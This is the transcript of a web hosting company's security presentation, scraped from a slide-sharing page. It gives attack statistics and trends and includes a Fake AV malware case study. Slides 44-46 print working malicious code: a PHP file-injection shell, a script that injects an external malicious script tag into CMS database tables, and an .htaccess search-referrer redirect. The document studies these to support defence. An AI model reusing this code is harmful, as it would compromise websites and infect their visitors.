1 / 56

Keeping up with the web application security

Ganesh Devarajan & Todd Redfoot. Keeping up with the web application security. Introduction. Todd Redfoot Chief Information Security Officer Ganesh Devarajan Sr. Security Architect. The Background (What does Go Daddy do?). What does Go Daddy do?. 9.4 Million Customers

susane
Download Presentation

Keeping up with the web application security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Ganesh Devarajan & Todd Redfoot Keeping up with the web application security

  2. Introduction • Todd Redfoot • Chief Information Security Officer • Ganesh Devarajan • Sr. Security Architect

  3. The Background(What does Go Daddy do?)

  4. What does Go Daddy do? • 9.4 Million Customers • 48 Million Domains Under Management • Over 5 million Active Hosting Accounts • 1/3 of all DNS queries run through our servers • We register, renew or transfer more than one domain name every second

  5. What does Go Daddy do? • 40+ Security Professionals in Team • 24 x 7 Operations Center • Research • Engineering • Forensics • Customer Security Advisors • Penetration Testing • User Administration • Development

  6. The Numbers(What does Go Daddy see?)

  7. What do we see? • Monitor over 100,000 events per second • 8.6 Billion/Day • DDoS- ~900 Attacks per day / 6K per week • Feb 2011 - Largest attack @ 21M pps • Last Week – 40G Attack • Brute Force – 3.5M per hour

  8. What do we see? • “Other” Attacks : • 425K – Invalid Directory Traversal • 90K – XSS Prevention • 115K – SQL Injection Prevention • … all in a 24 hour period…

  9. Current Trends

  10. SSH Brute Forcers

  11. SSH Brute Forcers Englewood, Colorado 140 Million attempts

  12. MS-SQL Brute Forcers

  13. MS-SQL Brute Forcers Orlando, FL 348 Million attempts

  14. My-SQL Brute Forcers

  15. My-SQL Brute Forcers

  16. FTP Brute Forcers

  17. FTP Brute Forcers XingPing, CN 12 Million attempts

  18. Brute Forcers - All

  19. Brute Forcers - US Garden City, NY 75.7 Million attempts

  20. Brute Forcers - CN Datong, CN 22.5 Million attempts

  21. Brute Forcinator

  22. SQL Injection

  23. SQL Injection Seattle, WA 1.3 Million attempts

  24. Backdoor Shells

  25. Backdoor Shells Phone Company (91%) Mountain View, CA

  26. PHP Attacks

  27. PHP Attacks Berlin, Germany 1.9 Million attempts

  28. PHP Attacks Montreal, CA 1.1 Million attempts

  29. Botnet

  30. Botnet

  31. Botnet Source - https://zeustracker.abuse.ch/

  32. Botnet Source - http://www.shadowserver.org/wiki/pmwiki.php/Stats/DroneMaps

  33. Phishing

  34. The Good, Bad and Ugly?

  35. The Bad – Most Events

  36. The Ugly – Security Events & DDoS

  37. New Trends

  38. Recent Changes • “Hacktivists” • Lulzsec = Twitter • ComodoHacker = Pastebin • Phishing -> Spear Phishing • Targeted & Coordinated Attacks • RSA / Lockheed Martin Connection

  39. What’s in the News?

  40. More of the same… • More Client-side Exploits • Browser exploits • Adobe exploits • Web Server Compromises • Brute Force Attacks • Leveraging Web Application Vulnerabilities • Config files with passwords

  41. Fake AV • Scareware • Reports fake viruses to users • Asks for fee to remove the threat • Paying does nothing but give them your CC# • $10 Million in Revenue last year

  42. Fake AV Analysis

  43. Fake AV – Attack Breakdown Registrant: Hilary Kneber hilarykneber@yahoo.com 7569468 fax: 7569468 29/2 Sun street. Montey 29 Virginia NA 3947

  44. Fake AV – Sample Shell $z=$_SERVER["DOCUMENT_ROOT"]; $encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>'; @unlink($_SERVER['SCRIPT_FILENAME']); $val=$z; $totalinjected=0; echo "Working with $val\n!!STARTING!!"; ob_flush(); $start_time=microtime(true); if ($val!="")do_folder($val); $end_time=microtime(true)-$start_time; echo "|Injected| $totalinjected files in $end_time seconds\n";

  45. Fake AV – DB Variant … $insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>'; ... $link=mysql_connect($host,$user,$pass); if (!$link) { die('Could not connect: ' . mysql_error()); }else{ echo 'Connected successfully'."\n"; $db_list = mysql_list_dbs($link); $bases = array(); while ($row = mysql_fetch_object($db_list)) { $bases[]=$row->Database; } … //wordpress if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; } //joomla if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')“; } //drupal if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2“; } if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')“; }

  46. Fake AV - Search Redirect <IfModulemod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L] </IfModule> addhandler x-httpd-php-cgi .php4 addhandler x-httpd-php5-cgi .php5 addhandler x-httpd-php5-cgi .php

  47. Custom Monitoring

  48. UDP Flooder

More Related